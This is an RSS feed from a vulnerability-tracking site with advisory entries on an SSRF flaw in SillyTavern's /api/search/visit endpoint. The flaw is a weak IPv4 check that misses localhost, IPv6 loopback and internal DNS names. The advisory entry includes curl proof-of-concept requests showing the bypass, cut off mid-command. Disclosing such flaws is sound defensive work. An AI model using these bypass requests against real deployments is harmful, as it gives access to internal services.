<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 04:00:53 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-278843</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-278843</link>
      <description>EUVD-2026-278843</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-278843</guid>
    </item>
    <item>
      <title>fkie_cve-2026-34526</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-34526</link>
      <description>&lt;p&gt;SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to version 1.17.0, in src/endpoints/search.js, the hostname is checked against /^\d+\.\d+\.\d+\.\d+$/. This only matches literal dotted-quad IPv4 (e.g. 127.0.0.1, 10.0.0.1). It does not catch: localhost (hostname, not dotted-quad), [::1] (IPv6 loopback), and DNS names resolving to internal addresses (e.g. localtest.me -&amp;gt; 127.0.0.1). A separate port check (urlObj.port !== &amp;#39;&amp;#39;) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF. This issue has been patched in version 1.17.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to version 1.17.0, in src/endpoints/search.js, the hostname is checked against /^\d+\.\d+\.\d+\.\d+$/. This only matches literal dotted-quad IPv4 (e.g. 127.0.0.1, 10.0.0.1). It does not catch: localhost (hostname, not dotted-quad), [::1] (IPv6 loopback), and DNS names resolving to internal addresses (e.g. localtest.me -&amp;gt; 127.0.0.1). A separate port check (urlObj.port !== &amp;#39;&amp;#39;) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF. This issue has been patched in version 1.17.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-34526</guid>
    </item>
    <item>
      <title>GHSA-wm7j-m6jm-8797 — SillyTavern: Incomplete IP validation in /api/search/visit allows SSRF via localhost and IPv6</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-wm7j-m6jm-8797</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: sillytavern&lt;/p&gt;
&lt;p&gt;### Details
Distinct from CVE-2025-59159 and CVE-2026-26286 (all fixed in v1.16.0). This endpoint is still unpatched.&lt;/p&gt;
&lt;p&gt;In `src/endpoints/search.js` line 419, the hostname is checked against `/^\d+\.\d+\.\d+\.\d+$/`. This only matches literal dotted-quad IPv4 (e.g. `127.0.0.1`, `10.0.0.1`). It does not catch:
- `localhost` (hostname, not dotted-quad)
- `[::1]` (IPv6 loopback)
- DNS names resolving to internal addresses (e.g. `localtest.me` -&amp;gt; 127.0.0.1)&lt;/p&gt;
&lt;p&gt;A separate port check (`urlObj.port !== &amp;#39;&amp;#39;`) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF.&lt;/p&gt;
&lt;p&gt;### PoC
1. Start SillyTavern v1.16.0 normally
2. Send requests to compare blocked vs bypassed (requires a valid session cookie or CSRF disabled):
```bash
# Blocked — dotted-quad matched by regex
curl -s -o /dev/null -w &amp;#34;%{http_code}&amp;#34; -X POST http://127.0.0.1:8000/api/search/visit \
  -H &amp;#34;Content-Type: application/json&amp;#34; \
  -d &amp;#39;{&amp;#34;url&amp;#34;: &amp;#34;http://127.0.0.1/&amp;#34;, &amp;#34;html&amp;#34;: true}&amp;#39;
# Returns: 400 (blocked)&lt;/p&gt;
&lt;p&gt;# Bypassed — &amp;#34;localhost&amp;#34; is not dotted-quad
curl -s -o /dev/null -w &amp;#34;%{http_code}&amp;#34; -X POST http://127.0.0.1:8000/api/search/visit \
  -H &amp;#34;Content-Type: application/json&amp;#34; \
  -d &amp;#39;{&amp;#34;url&amp;#34;: &amp;#34;http://localhost/&amp;#34;, &amp;#34;html&amp;#34;: true}&amp;#39;
# Returns: 500 (passed validation, fetch attempted, ECONNREFUSED because nothing on port 80)&lt;/p&gt;
&lt;p&gt;# Bypassed — IPv6 loopback is not dotted-quad
curl -s -o /dev/null -w &amp;#34;%{http_code}&amp;#34; -X POST http://127.0.0.1:8000/api/search/visit \
  -H &amp;#34;Content-Type: applicat…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: sillytavern&lt;/p&gt;
&lt;p&gt;### Details
Distinct from CVE-2025-59159 and CVE-2026-26286 (all fixed in v1.16.0). This endpoint is still unpatched.&lt;/p&gt;
&lt;p&gt;In `src/endpoints/search.js` line 419, the hostname is checked against `/^\d+\.\d+\.\d+\.\d+$/`. This only matches literal dotted-quad IPv4 (e.g. `127.0.0.1`, `10.0.0.1`). It does not catch:
- `localhost` (hostname, not dotted-quad)
- `[::1]` (IPv6 loopback)
- DNS names resolving to internal addresses (e.g. `localtest.me` -&amp;gt; 127.0.0.1)&lt;/p&gt;
&lt;p&gt;A separate port check (`urlObj.port !== &amp;#39;&amp;#39;`) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF.&lt;/p&gt;
&lt;p&gt;### PoC
1. Start SillyTavern v1.16.0 normally
2. Send requests to compare blocked vs bypassed (requires a valid session cookie or CSRF disabled):
```bash
# Blocked — dotted-quad matched by regex
curl -s -o /dev/null -w &amp;#34;%{http_code}&amp;#34; -X POST http://127.0.0.1:8000/api/search/visit \
  -H &amp;#34;Content-Type: application/json&amp;#34; \
  -d &amp;#39;{&amp;#34;url&amp;#34;: &amp;#34;http://127.0.0.1/&amp;#34;, &amp;#34;html&amp;#34;: true}&amp;#39;
# Returns: 400 (blocked)&lt;/p&gt;
&lt;p&gt;# Bypassed — &amp;#34;localhost&amp;#34; is not dotted-quad
curl -s -o /dev/null -w &amp;#34;%{http_code}&amp;#34; -X POST http://127.0.0.1:8000/api/search/visit \
  -H &amp;#34;Content-Type: application/json&amp;#34; \
  -d &amp;#39;{&amp;#34;url&amp;#34;: &amp;#34;http://localhost/&amp;#34;, &amp;#34;html&amp;#34;: true}&amp;#39;
# Returns: 500 (passed validation, fetch attempted, ECONNREFUSED because nothing on port 80)&lt;/p&gt;
&lt;p&gt;# Bypassed — IPv6 loopback is not dotted-quad
curl -s -o /dev/null -w &amp;#34;%{http_code}&amp;#34; -X POST http://127.0.0.1:8000/api/search/visit \
  -H &amp;#34;Content-Type: applicat…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-wm7j-m6jm-8797</guid>
    </item>
  </channel>
</rss>
